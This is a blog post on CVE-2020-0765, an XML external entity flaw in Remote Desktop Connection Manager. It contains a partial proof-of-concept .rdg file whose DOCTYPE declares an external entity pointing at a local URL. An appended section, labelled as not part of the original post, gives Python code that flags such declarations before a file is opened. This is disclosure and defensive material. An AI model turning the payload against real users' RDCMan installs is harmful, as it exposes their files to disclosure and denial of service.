Rafael Rivera

CVE-2020-0765: Quick proof of concept

Remote Desktop Connection Manager (RDCMan) spins up ancient XmlReader and XmlTextReader instances without considering DTD and entity handling, resulting in a bag of information disclosure (and denial of service) vulnerabilities. Here's a quick .rdg I put together to test against.

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ENTITY foo SYSTEM "http://localhost:11223/">
]>
<RDCMan programVersion="2.7" schemaVersion="3">
<credentialsProfiles />
<connected />
<favorites />
<recentlyUsed />
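
A pre-open check for .rdg files received from someone else, as an added example that is not part of the original post: it uses Python's expat bindings to list DOCTYPE and entity declarations without ever fetching what they point at. The function names, the sample bytes and the policy that any DTD makes a file suspect are assumptions made for this example.

```python
import xml.parsers.expat

# Constructed sample: the declarations shown in the post, closed so that it parses.
SUSPECT_RDG = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ENTITY foo SYSTEM "http://localhost:11223/">
]>
<RDCMan programVersion="2.7" schemaVersion="3">
<connected />
</RDCMan>
"""

# Constructed sample: the same settings file with no DTD.
CLEAN_RDG = b"""<?xml version="1.0" encoding="utf-8"?>
<RDCMan programVersion="2.7" schemaVersion="3">
<connected />
</RDCMan>
"""


def inspect_rdg(data: bytes) -> dict:
    """List DTD and entity declarations in an .rdg file without resolving them."""
    found = {"doctype": None, "external": [], "internal": [], "error": None}

    def on_doctype(name, system_id, public_id, has_internal_subset):
        found["doctype"] = name
        if system_id:
            found["external"].append(("(external DTD subset)", system_id))

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if value is None:      # external entity: SYSTEM or PUBLIC identifier
            found["external"].append((name, system_id))
        else:                  # internal entity: replacement text declared inline
            found["internal"].append(name)

    # expat only reports declarations here: with no ExternalEntityRefHandler
    # installed, it never opens the URL or path an entity points at.
    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        found["error"] = str(exc)   # malformed input is reported, not trusted
    return found


def is_suspect(data: bytes) -> bool:
    """Assumed policy: a settings file has no reason to carry a DTD at all."""
    found = inspect_rdg(data)
    return found["doctype"] is not None or found["error"] is not None
```

Run `is_suspect()` over the raw bytes of a file before opening it in an affected RDCMan build; `inspect_rdg()` returns the entity names and system identifiers for triage.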